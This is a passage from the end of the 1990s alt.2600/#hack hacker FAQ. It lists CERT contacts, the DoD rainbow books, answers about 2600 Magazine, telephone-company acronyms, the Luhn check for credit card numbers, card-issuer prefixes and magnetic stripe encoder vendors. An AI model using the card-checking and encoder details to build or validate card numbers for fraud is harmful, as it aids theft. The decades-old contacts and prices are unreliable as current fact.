provides an anonymous FTP server: cert.org (192.88.209.5), where security-related documents, past CERT advisories, and tools are archived. CERT contact information: U.S. mail address CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA 15213-3890 U.S.A. Internet E-mail address cert@cert.org Telephone number +1 412-268-7090 (24-hour hotline) CERT Coordination Center personnel answer 7:30 a.m.- 6:00 p.m. EST(GMT-5)/EDT(GMT-4), on call for emergencies during other hours. FAX number +1 412-268-6989 12. Where can I purchase a magnetic stripe encoder/decoder? CPU Advance PO Box 2434 Harwood Station Littleton, MA 01460 (508)624-4819 (Fax) Omron Electronics, Inc. One East Commerce Drive Schaumburg, IL 60173 (800)556-6766 (Voice) (708)843-7787 (Fax) Security Photo Corporation 1051 Commonwealth Avenue Boston, MA 02215 (800)533-1162 (Voice) (617)783-3200 (Voice) (617)783-1966 (Voice) Timeline Inc, 23605 Telo Avenue Torrence, CA 90505 (800)872-8878 (Voice) (800)223-9977 (Voice) 13. What are the rainbow books and how can I get them? Orange Book DoD 5200.28-STD Department of Defense Trusted Computer System Evaluation Criteria Green Book CSC-STD-002-85 Department of Defense Password Management Guideline Yellow Book CSC-STD-003-85 Computer Security Requirements -- Guidance for Applying the Department of Defense Trusted Computer System Evaluation Criteria in Specific Environments Yellow Book CSC-STD-004-85 Technical Rationale Behind CSC-STD-003-85: Computer Security Requirements. Guidance for Applying the Department of Defense Trusted Computer System Evaluation Criteria in Specific Environments. Tan Book NCSC-TG-001 A Guide to Understanding Audit in Trusted Systems Bright Blue Book NCSC-TG-002 Trusted Product Evaluation - A Guide for Vendors Neon Orange Book NCSC-TG-003 A Guide to Understanding Discretionary Access Control in Trusted Systems Teal Green Book NCSC-TG-004 Glossary of Computer Security Terms Red Book NCSC-TG-005 Trusted Network Interpretation of the Trusted Computer System Evaluation Criteria Orange Book NCSC-TG-006 A Guide to Understanding Configuration Management in Trusted Systems Burgundy Book NCSC-TG-007 A Guide to Understanding Design Documentation in Trusted Systems Dark Lavender Book NCSC-TG-008 A Guide to Understanding Trusted Distribution in Trusted Systems Venice Blue Book NCSC-TG-009 Computer Security Subsystem Interpretation of the Trusted Computer System Evaluation Criteria Aqua Book NCSC-TG-010 A Guide to Understanding Security Modeling in Trusted Systems Dark Red Book NCSC-TG-011 Trusted Network Interpretation Environments Guideline -- Guidance for Applying the Trusted Network Interpretation Pink Book NCSC-TG-013 Rating Maintenance Phase -- Program Document Purple Book NCSC-TG-014 Guidelines for Formal Verification Systems Brown Book NCSC-TG-015 A Guide to Understanding Trusted Facility Management Yellow-Green Book NCSC-TG-016 Guidelines for Writing Trusted Facility Manuals Light Blue NCSC-TG-017 A Guide to Understanding Identification and Authentication in Trusted Systems Light Blue Book NCSC-TG-018 A Guide to Understanding Object Reuse in Trusted Systems Blue Book NCSC-TG-019 Trusted Product Evaluation Questionnaire Gray Book NCSC-TG-020A Trusted Unix Working Group (TRUSIX) Rationale for Selecting Access Control List Features for the Unix System Lavender Book NCSC-TG-021 Trusted Data Base Management System Interpretation of the Trusted Computer System Evaluation Criteria Yellow Book NCSC-TG-022 A Guide to Understanding Trusted Recovery in Trusted Systems Bright Orange Book NCSC-TG-023 A Guide to Understandng Security Testing and Test Documentation in Trusted Systems Purple Book NCSC-TG-024 (Volume 1/4) A Guide to Procurement of Trusted Systems: An Introduction to Procurement Initiators on Computer Security Requirements Purple Book NCSC-TG-024 (Volume 2/4) A Guide to Procurement of Trusted Systems: Language for RFP Specifications and Statements of Work - An Aid to Procurement Initiators Purple Book NCSC-TG-024 (Volume 3/4) A Guide to Procurement of Trusted Systems: Computer Security Contract Data Requirements List and Data Item Description Tutorial +Purple Book +NCSC-TG-024 (Volume 4/4) +A Guide to Procurement of Trusted Systems: How to Evaluate a Bidder's +Proposal Document - An Aid to Procurement Initiators and Contractors Green Book NCSC-TG-025 A Guide to Understanding Data Remanence in Automated Information Systems Hot Peach Book NCSC-TG-026 A Guide to Writing the Security Features User's Guide for Trusted Systems Turquiose Book NCSC-TG-027 A Guide to Understanding Information System Security Officer Responsibilities for Automated Information Systems Violet Book NCSC-TG-028 Assessing Controlled Access Protection Blue Book NCSC-TG-029 Introduction to Certification and Accreditation Light Pink Book NCSC-TG-030 A Guide to Understanding Covert Channel Analysis of Trusted Systems C1 Technical Report-001 Computer Viruses: Prevention, Detection, and Treatment *C Technical Report 79-91 *Integrity in Automated Information Systems *C Technical Report 39-92 *The Design and Evaluation of INFOSEC systems: The Computer Security *Contributions to the Composition Discussion NTISSAM COMPUSEC/1-87 Advisory Memorandum on Office Automation Security Guideline -- You can get your own free copy of any or all of the books by writing or calling: INFOSEC Awareness Division ATTN: X711/IAOC Fort George G. Meade, MD 20755-6000 Barbara Keller (410) 766-8729 If you ask to be put on the mailing list, you'll get a copy of each new book as it comes out (typically a couple a year). [* == I have not personally seen this book] [+ == I have not personally seen this book, and I believe it may not] [ be available] Section D: 2600 ~~~~~~~~~~~~~~~ 01. What is alt.2600? Alt.2600 is a Usenet newsgroup for discussion of material relating to 2600 Magazine, the hacker quarterly. It is NOT for the Atari 2600 game machine. Len@netsys.com created the group on Emmanuel Goldstein's recommendation. Emmanuel is the editor/publisher of 2600 Magazine. Following the barrage of postings about the Atari machine to alt.2600, an alt.atari.2600 was created to divert all of the atari traffic from alt.2600. Atari 2600 people are advised to hie over to rec.games.video.classic. 02. What does "2600" mean? 2600Hz was a tone that was used by early phone phreaks (or phreakers) in the 80's, and some currently. If the tone was sent down the line at the proper time, one could get away with all sorts of fun stuff. A note from Emmanuel Goldstein: "The Atari 2600 has NOTHING to do with blue boxes or telephones or the 2600 hertz tone. The 2600 hertz tone was simply the first step towards exploring the network. If you were successful at getting a toll call to drop, then billing would stop at that point but there would be billing for the number already dialed up until the point of seizure. 800 numbers and long distance information were both free in the past and records of who called what were either non-existent or very obscure with regards to these numbers. This, naturally, made them more popular than numbers that showed up on a bill, even if it was only for a minute. Today, many 800 numbers go overseas, which provides a quick and free way into another country's phone system which may be more open for exploration." 03. Are there on-line versions of 2600 available? No. 04. I can't find 2600 at any bookstores. What can I do? Subscribe. Or, let 2600 know via the subscription address that you think 2600 should be in the bookstore. Be sure to include the bookstores name and address. 05. Why does 2600 cost more to subscribe to than to buy at a newsstand? A note from Emmanuel Goldstein: We've been selling 2600 at the same newsstand price ($4) since 1988 and we hope to keep it at that price for as long as we can get away with it. At the same time, $21 is about the right price to cover subscriber costs, including postage and record keeping, etc. People who subscribe don't have to worry about finding an issue someplace, they tend to get issues several weeks before the newsstands get them, and they can take out free ads in the 2600 Marketplace. This is not uncommon in the publishing industry. The NY Times, for example, costs $156.50 at the newsstands, and $234.75 delivered to your door. Section E: Miscellaneous ~~~~~~~~~~~~~~~~~~~~~~~~ 01. What does XXX stand for? TLA Three Letter Acronym ACL Access Control List PIN Personal Identification Number TCB Trusted Computing Base ALRU Automatic Line Record Update AN Associated Number ARSB Automated Repair Service Bureau ATH Abbreviated Trouble History BOC Bell Operating Company BOR Basic Output Report BOSS Business Office Servicing System CA Cable COE Central Office Equipment COSMOS Computer System for Main Frame Operations CMC Construction Maintenance Center CNID Calling Number IDentification CO Central Office COCOT Customer Owned Coin Operated Telephone CRSAB Centralized Repair Service Answering Bureau DDD Direct Distance Dialing ECC Enter Cable Change LD Long Distance LMOS Loop Maintenance Operations System MLT Mechanized Loop Testing NPA Numbering Plan Area POTS Plain Old Telephone Service RBOC Regional Bell Operating Company RSB Repair Service Bureau SS Special Service TAS Telephone Answering Service TH Trouble History TREAT Trouble Report Evaluation and Analysis Tool LOD Legion of Doom HFC Hell Fire Club TNO The New Order ACiD Ansi Creators in Demand CCi Cybercrime International FLT Fairlight iCE Insane Creators Enterprise iNC International Network of Crackers NTA The Nocturnal Trading Alliance PDX Paradox PE Public Enemy PSY Psychose QTX Quartex RZR Razor (1911) S!P Supr!se Productions TDT The Dream Team THG The Humble Guys THP The Hill People TRSI Tristar Red Sector Inc. 02. How do I determine if I have a valid credit card number? Credit cards use the Luhn Check Digit Algorithm. The main purpose of this algorithm is to catch data entry errors, but it does double duty here as a weak security tool. For a card with an even number of digits, double every odd numbered digit and subtract 9 if the product is greater than 9. Add up all the even digits as well as the doubled-odd digits, and the result must be a multiple of 10 or it's not a valid card. If the card has an odd number of digits, perform the same addition doubling the even numbered digits instead. 03. What bank issued this credit card? 1033 Manufacturers Hanover Trust 1035 Citibank 1263 Chemical Bank 1665 Chase Manhattan 4024 Bank of America 4128 Citicorp 4209 New Era Bank 4302 HHBC 4310 Imperial Savings 4313 MBNA 4317 California Federal 5282 Wells Fargo 5424 Citibank 5410 Wells Fargo 5432 Bank of New York 6017 MBNA 04. What are the ethics of hacking? The FAQ answer is excerpted from: Hackers: Heroes of the Computer Revolution by Steven Levy Access to computers -- and anything which might teach you something about the way the world works -- should be unlimited and total. Always yield to the Hands-On imperative. All information should be free. Mistrust Authority. Promote Decentralization. Hackers should be judged by their hacking, not bogus criteria such as degrees, age, race, or position. You can create art and beauty on a computer. Computers can change your life for the better. 04. Where can I get a copy of the alt.2600/#hack FAQ? Get it on FTP at: rahul.net /pub/lps rtfm.mit.edu /pub/usenet-by-group/alt.2600 Get it on the World Wide Web at: http://dfw.net/~aleph1 http://www.engin.umich.edu/~jgotts/hack-faq.html http://www.phantom.com/~king Get it by E-Mail at: hackfaq@sekurity.com (Subject: send faq) EOT